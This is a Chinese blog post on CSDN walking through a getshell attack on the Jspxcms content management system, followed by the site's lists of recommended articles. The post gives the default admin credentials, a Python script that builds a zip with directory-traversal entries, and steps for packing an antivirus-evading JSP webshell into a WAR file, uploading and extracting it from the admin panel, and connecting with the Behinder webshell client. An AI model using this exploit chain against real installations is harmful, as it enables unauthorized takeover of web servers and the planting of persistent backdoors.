Jspxcms后台的zip解压功能getshell

最新推荐文章于 2024-05-28 09:25:21 发布
最新推荐文章于 2024-05-28 09:25:21 发布
阅读量290 收藏
点赞数
分类专栏: 渗透测试 文章标签: java 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_46317063/article/details/130364797
版权

Jspxcms后台的zip解压功能getshell

由于这套CMS做了相关防御配置,压缩包里像上文中直接加入JSP文件是无法执行的,会报403错误。因而想到使用目录穿越的方式,跳出JspxCM的根目录,并根据war包会自动解压的特点,从而getshell。
jspxcms默认账号密码:admin/123456

import zipfile

if __name__ == "__main__":
    try:
        binary = b''
        zipFile = zipfile.ZipFile("jspxcms.zip", "a", zipfile.ZIP_DEFLATED)

        info = zipfile.ZipInfo("jspxcms.zip")
        zipFile.writestr("../../../test.html", binary)
        zipFile.writestr("../../../", binary)
        zipFile.writestr("../../", binary)
        zipFile.writestr("../", binary)

        zipFile.close()

    except IOError as e:
        raise e

使用webshell免杀工具生成免杀jsp,并打包成war
本次使用的是:https://github.com/Tas9er/ByPassBehinder
在这里插入图片描述
将生成的war包拖到python生成的zip中:
在这里插入图片描述
进入后台,上传并解压;
在这里插入图片描述

访问 上传成功
在这里插入图片描述
冰蝎连接:
在这里插入图片描述

ju_ju_bone
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
如何在Tomcat后台通过文件上传getshell总结(个人学习笔记思路)
m0_58792545的博客
07-27 2294
关于文件上传getshell的一些思路以及细节总结
jboss漏洞getshell工具.zip
08-26
jboss漏洞getshell工具
jspxcms内容管理系统CMS
04-03
jspxcms是一个开源的、基于Java的内容管理系统(CMS),技术上选择JavaEE行业最先进、最主流、最稳定的技术,非常适合二次开发功能扩展、插件开发。使用的技术包括SpringMVC 3.1、Spring 3.1、Hibernate 3.6、JSP 2.0和Freemarker 2.3等。 jspxcms-5.1.0-release.zip jspxcms-5.1.0-release-eclipse.zip jspxcms-5.1.0-release-src.zip
国内Java开源内容管理系统 Jspxcms 5.1 发布
weixin_34410662的博客
09-19 310
Jspxcms-5.1.0-release今天正式发布。这次发布重点提高了系统的稳定性和可维护性、修复了BUG。更新列表: 1、附件管理。可以删除无效附件和图片。 2、增加邮件加密发送。 3、采集新闻下一页的错误。 4、邮件发送要求SSL加密时出现错误。 5、定时任务没有分站点。 6、评论设置页没有返回按钮。 7、模版管理中,zip打...
jspxcms
lastwinn的博客
08-01 1807
jspxcms 先百度一下后台地址 /cmscp/index.do 然后百度默认密码,默认密码为空。 找到一篇rce https://www.hacksec.cn/Penetration-test/1284.html Jspxcms后台zip解压功能目录穿越漏洞导致getshell 由于这套CMS做了相关防御配置,压缩包里像上文中直接加入JSP文件是无法执行的,会报403错误。因而想到使用目录穿越的方式,跳出JspxCM的根目录,并根据war包会自动解压的特点,从而...
Jspxcms
xiexuzhao的专栏
04-20 1661
http://git.oschina.net/jspxcms/Jspxcms
Jspxcms-9.5.1由zip解压功能导致的目录穿越漏洞分析
st3pby的博客
12-26 617
Jspxcms 是企业级开源网站内容管理系统,支持多组织、多站点、独立管理的网 站群,也支持 Oracle、SQL Server、MySQL 等数据库。Jspxcms-9.5.1 及之前版本的后台 ZIP 文件解压功能存在目录穿越漏洞,攻击者可以利用该漏洞,构造包含恶意 WAR 包的 ZIP 文件,达到 Getshell 的破坏效果。
ThinkPHP_getshell-v2.zip
11-11
验证think PHP5版本漏洞并可以getshell
垃圾桶后台管理功能.zip
01-25
垃圾桶后台管理功能
C#调用系统功能解压zip文件
12-22
C#调用系统功能zipfldr)解压zip文件,支持Windows XP、Windows Vista/7/8/10。其中提供了两种方法,一种只能支持编译计算机使用的操作系统,另一种支持各版本Windows操作系统(默认) 单击demo按钮:即可将"c:\123\...
收割机Getshell软件.zip
05-30
扫描后缀.txt,存放shell扫描用的后缀,自己可以添加更多后缀。 webshell.txt,存放扫描到的Webshell。 uploaddata/asp.txt,存放asp上传文件。 uploaddata/aspx.txt,存放aspx上传文件。 uploaddata/php.txt,存放...
java学习和项目总结
2301_79390585的博客
05-24 696
JRE:JRE是Java 运行时环境,主要包括了两个运行需要的组件:JVM 和 Java 核心类库,如果不进行java开发只想运行就可以只下载JRE。而Java语言,它的代码会先通过javac编译成字节码,再通过jvm将字节码转换成机器码(0和1)执行,即解释运行和编译运行配合使用,所以是混合型。在程序运行之前,通过编译器将源程序编译成机器码可运行的二进制,以后执行这个程序时,就不用再进行编译了。JVM:JVM是java进行编译的虚拟机,是Java 能够跨平台运行的核心。特点:执行速度慢、效率低;
Java高级面试精粹:问题与解答集锦(一)
Layla_c的博客
05-23 1434
答案多态是Java中的一个核心概念,它允许不同类的对象对同一消息做出响应,但具体的行为会根据对象的实际类型而有所不同。重载(Overloading):当多个方法具有相同的名称,但参数列表不同时,这称为方法重载。编译器根据方法调用时传递的参数类型和数量来确定调用哪个方法。重写(Overriding):当子类有一个与父类同名、同参数列表的方法时,子类可以提供特定的实现来覆盖父类的方法。运行时,Java虚拟机(JVM)会根据对象的实际类型调用相应的方法,这个过程称为动态绑定或晚期绑定。答案。
JVM学习-执行引擎
丢爸
05-21 1142
当然是否需要启动JIT编译器将字节码直接编译为对应平台的本地机器指令,则需要根据代码被调用。大部分的程序代码转换为物理机的目标代码或虚拟机能执行的指令集之前,都需要经过下图各个步骤。,将其直接编译为对应平台的本地机器指令,以此提升Java程序的执行性能。”,JIT编译器在运行时会针对那些频繁被调用的热点代码做出。Java代码编译是由Java源码编译器来完成,流程图如下。而定,关于那些需要被编译为本地代码的字节码,称为“Java字节码的执行是由JVM执行引擎来完成。
数据访问与Spring Data JPA
无远弗届
05-25 521
假设我们要处理一个用户表(users),可以创建一个User@Entity // 标识这是一个实体类 public class User {@Id // 标识这是主键字段 @GeneratedValue(strategy = GenerationType . AUTO) // 主键生成策略 private Long id;// Getter 和 Setter ... }@Entity // 标识这是一个实体类 public class User {
operator <=> (spaceship operator)
最新发布
janeqi1987的专栏
05-28 588
= 与!= 操作符为了检查是否相等,现在定义== 操作符就够了。当编译器找不到表达式的匹配声明a!=b 时,编译器会重写表达式并查找!(a==b)。若这不起作用,编译器也会尝试改变操作数的顺序,所以也会尝试!(b==a):a!=b,!(b==a)因此,对于TypeA 的a 和TypeB 的b,编译器将能够识别并编译a!= b若需要的话,可以这样做• 一个独立函数operator!• 一个独立函数operator==(TypeA, TypeB)
深入理解Java的垃圾回收机制(GC)实现原理
微笑听雨
05-25 1803
GC是Java虚拟机的重要组成部分,通过自动内存管理,GC提高了Java程序的稳定性和安全性。理解GC的工作原理和不同收集器的特点,有助于选择合适的GC策略,优化应用性能。通过合理配置JVM参数,可以提高GC效率,减少应用停顿时间,提升系统的整体性能。
Spring6基础笔记
质胜文则野,文胜质则史。文质彬彬,然后君子。
05-21 988
Spring 是一款主流的 Java EE 轻量级开源框架 ,Spring 由“Spring 之父”Rod Johnson 提出并创立,其目的是用于简化 Java 企业级应用的开发难度和开发周期。Spring的用途不仅限于服务器端的开发。从简单性、可测试性和松耦合的角度而言,任何Java应用都可以从Spring中受益。Spring 框架除了自己提供功能外,还提供整合其他技术和框架的能力。Spring 自诞生以来备受青睐,一直被广大开发人员作为 Java 企业级应用程序开发的首选。时至今日,Spring 俨然
shell zip解压命令
05-11
shell中,可以使用unzip命令来解压zip文件。 具体的命令格式为: ``` unzip filename.zip ``` 其中,filename.zip为需要解压zip文件名,解压后的文件会被放置在当前目录下。 如果需要将解压后的文件放置在指定的目录下,可以使用"-d"选项,例如: ``` unzip filename.zip -d /path/to/directory ``` 这样,解压后的文件就会被放置在指定的目录下。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值